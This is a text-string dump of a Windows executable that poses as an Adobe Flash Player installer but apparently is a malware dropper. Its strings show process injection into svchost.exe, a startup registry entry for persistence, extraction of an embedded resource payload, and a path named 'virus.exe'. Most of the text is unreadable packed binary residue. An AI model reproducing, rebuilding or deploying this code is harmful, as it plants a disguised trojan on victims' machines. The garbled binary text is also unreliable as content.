L!This program cannot be run in DOS mode.
{E!?+r?+r?+r%r;+r?*r
+rvr4+r
!r;+r-r>+r/r>+rRich?+r
.rdata
@.data
SVWj@3Y3j@fY3fj?3Y]f]E
MSQEuPV
YYPV50@
ESPuW=0@
ESPuhC
;t$uuh
X^UQQV5
WEWP}}
;t'EPEPEPh
3?;3j u
A(;r3_^[
LSn6$@x/Z
V)[tOx$
+Txs,I
utaO=k1G33
DXS@c&d
Z }Y3QCy
.hzJU*q
H,bN#o7?
n7h@)%r
kA7b&Vm.=i:}yc
Kr+yk2Z
r;Fbq
K}=~s%MIlu6rU3= ;f?'M
i(/prBRy=w?!
o\^3xG;
NLXMaW
8udc#-o#
/1}0h-
^7WM9Ba
`(InTUl%y<i!
{#6rmg
f_*tppDYCe
*d?L<]
'x/7QY"r
O\3s>\h;
oU8?24
nSOy_[
4)B g=\]G&
MO$z\S
|_^[]UE
Q@@Ed*h
!>a$_b
'i_6De
7p)9iO
t_w[Vfn-
R&0>=uL
8so7?(
EE~cSVu
3fj@3Yj@fY3fj@3Yu
]f]@~)M
GEQ@9E|
3tESPPPPu
X_^[U@fe
3Y}fhS"@
EPEhA@
V3WV3}h
V#VPVWu
uRFGHt
t+t'NW8u
;uH_^Q=
r)$x%@
DDDDDDDDDDDDDD
w$w6w! w+ww
`u_iwejw3w)wMw
`uwI"wO!w[w`w`ww
owwA#wIwAw1#ww
=wwww6w
w|w)w-w
G?w9)w
EndUpdateResourceA
UpdateResourceA
BeginUpdateResourceA
CloseHandle
WriteFile
SetFilePointer
ExitProcess
ReadFile
HeapAlloc
GetProcessHeap
GetFileSize
CreateFileA
CopyFileA
MoveFileExA
GetTempFileNameA
GetTempPathA
GetModuleFileNameA
LockResource
LoadResource
SizeofResource
FindResourceA
GetLastError
lstrcpyA
MoveFileA
DeleteFileA
lstrcatA
lstrcmpiA
GetLongPathNameA
ExpandEnvironmentStringsA
GetTickCount
LeaveCriticalSection
GetProcAddress
EnterCriticalSection
VirtualProtect
InitializeCriticalSection
GetModuleHandleA
TerminateProcess
VirtualAllocEx
HeapFree
VirtualAlloc
lstrlenA
WinExec
GetLocalTime
SetUnhandledExceptionFilter
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
KERNEL32.dll
wsprintfA
MessageBeep
MessageBoxA
USER32.dll
CryptReleaseContext
CryptGenRandom
CryptAcquireContextA
CloseServiceHandle
EnumServicesStatusA
OpenSCManagerA
ADVAPI32.dll
StrChrA
PathRemoveFileSpecA
StrRChrIA
SHLWAPI.dll
MiniDumpWriteDump
dbghelp.dll
roudanx.exe
szFile
svchost.exe
RT_RCDATA
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinHttp
szFile
ResumeThread
SetThreadContext
WriteProcessMemory
VirtualProtectEx
VirtualQueryEx
ReadProcessMemory
GetThreadContext
CreateProcessA
kernel32
ZwUnmapViewOfSection
Are you sure?
regedit.exe /s
~dfds3.reg
%tmp%\
Windows Registry Editor Version 5.00
"%s"="%s"
%04d-%02d-%02d_%02d-%02d-%02d.dmp
kernel32.ResumeThread
wwBNwww
wc:\temp\virus.exe
c:\temp\2015-05-01_22-53-25.dmp
yY8l#O-=_0L9{8
x\[vd2T
O\F"DmiF).}M
<z|w=\U@
k,3z5V
tG3q44C2O
)D'1s`\?
jp]R#Dg$
K(Ovy_%5
}^Wt,#
$_~"Ezf
1P<#[Xe
*#*UTcBqH^/
ID`zl3P;B+V
~1B&>Sj
$:xMfn+
ZL{&!Nl0q
1X++DE=
rnh6?=.cU
PJ1euz5k]9
bep||+lA
&UqHK*YF8e
b}$y"*dV]
v2<Up;0e
0j\$zQ
u||<HR
@#8Vop
$[ed@0!L
}W__6b
mZ3[?~XwB<J
ak;{.G
X<?^F/;
vrMdP>mN
97Xm-tPml
2O6F_q
?vL3 N
z86`'wr
P?OHU;
*#?By^
g8x5C.lQ
2Me7iZ
xy:]Lu*y7
,8?w2/|LTwg!Q@AT{$o
_u9ON^/w4
sMwgj5>{
zd*wiJ
#'=$l#y
E<uRfi7^k`>
c!!+#O
L>;D[C\
EUL QqOn{@=gTk
AzW++jmV6\ad'PazQ#6aK
C=TW/fw6\^iZ9Z(R
!S^Bvjq
Uw"sk,!3"L
m9Y|c+?x
)^&nmL5mtQ`
'v)T:7
9p-p_Q
?f`&^F.
{vV}fw
*/~rWO~&
xN1C)db
+GG[2@!
PyLa`N(pMr6
Th({2Go?N
.e[QO@vt
U'Aa4[$`K:
{)U8if`zhB
&eaRpUO
;g)Wg`
UsrO}Lr
GtLD@x
/3lfB5
rC@zK?b
i%r#kCJM
P_6%GR
&}PHTU4CF
apua"|\S4~
k6c*6)'Jjx
8\\#9"MB
h@ID7mt57
^XC1{<
|A6BoFX
0th(J
TW(u.}
..0f7C
dtV6x5
tu)2$r{
[hM\xb
iOgz.G
50E1}Ti\D
@vGL9|H^HQ
j;+Nhe)
j_>vcp"~/;S
Z_AU,Y1z)I1^r
V2BCeMli_My
L9S'e^`Z"
R4"SFJgG
y-JJQ>K|
6B`m%g@
rr{O|p%Y
;7Y1^GR
m135"WO}$.
55'>Y^,
$]`2Hv*><.
vM2>cy%f3
|5&(+1&qK~
|<8p-/_
Ju3.#>+v%
5_Cyu`wYO695
Cio@|\wV@CeM
[$rm~)
1Qk6SJ{kW3^7d:X3n|
o@ wB->P
_F1.5hh@
VvPdz:K
/Ne">PEwiLs6:
o$AQ*rwn^
:,ap5p
sbv8DwTEI-s
8b29g$^
/41nXv/\D*)F
;iR[PS2
Wt{7QU"O[x]
m#^):7
0cJLtB
NOO2c4
gB5#}y~
Os|wy@iH
{g(Y0{3r
3I}$%V
--PjO
mG"3n*y`R
M#;Uo|duni
tD@@zwdf
`#%NJ`mBrYhXa
m-]wn[h
o08j#b
rbiVQ8\O
tXM4|&ui
/x3-H9l3e@%
m/V<gU8
@o;1n@.
5Y$3D*
MiL)@.0D"
{9>bi(jg
/(v|#yqG@
bXz*^'q3
~;*$|B|
ZKn:&?Td$k
#8hbX
OMWR&I
j*msk8
3kU=I7 (
>$LU8sU
*jaYm"
:hK\GU
2kN^n=\V9Zv
Y)&WB0YL
N7']F>
uE8n7u
w^[R#o
K>oNJw
d\C;d`
i(i|oA
(hhF4Rj%
0GQ9lg
>|M3`6
Xfm9)r4\?7(s/+]
HEF<{%M
`fg+}<
vQQE@-s
^G m*`F
X$yN\G4'RT
e|XH3_R
LekUUo
B\1!kl
\n"Y;
oic9ehS<R
^6@=/h
yRGdr
*tN'A-
GY1zQ^B
}Ie^0vl=1D
m~vGC6OKW
,.xeip,
SM<FRzk8;
6g$/;bw
5&9G82
Zr+p)lw>
JS~O(i
hjert
'QZ'UYr$
*<"ZanG
W-uOb)f
%8:Z'EE
dyh/uVy?mO
LI[L57{
{{3)J9
*beS!
A^(?]CXEA
;x8=\<3
luckxO
lhLTn1oa[o
l~(he=th7
c`X>~F+)
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
R T _ R C D A T A
V S _ V E R S I O N _ I N F O
S t r i n g F i l e I n f o
0 4 0 9 0 4 b 0
C o m p a n y N a m e
A d o b e S y s t e m s , I n c .
F i l e D e s c r i p t i o n
A d o b e ? F l a s h ? P l a y e r I n s t a l l e r / U n i n s t a l l e r 1 0 . 1 r 5 3
F i l e V e r s i o n
1 0 , 1 , 5 3 , 6 4
I n t e r n a l N a m e
A d o b e ? F l a s h ? P l a y e r I n s t a l l e r / U n i n s t a l l e r 1 0 . 1
L e g a l C o p y r i g h t
C o p y r i g h t ? 1 9 9 6 - 2 0 1 0 A d o b e , I n c .
L e g a l T r a d e m a r k s
A d o b e ? F l a s h ? P l a y e r
O r i g i n a l F i l e n a m e
F l a s h U t i l . e x e
P r o d u c t N a m e
F l a s h ? P l a y e r I n s t a l l e r / U n i n s t a l l e r
P r o d u c t V e r s i o n
1 0 , 1 , 5 3 , 6 4
V a r F i l e I n f o
T r a n s l a t i o n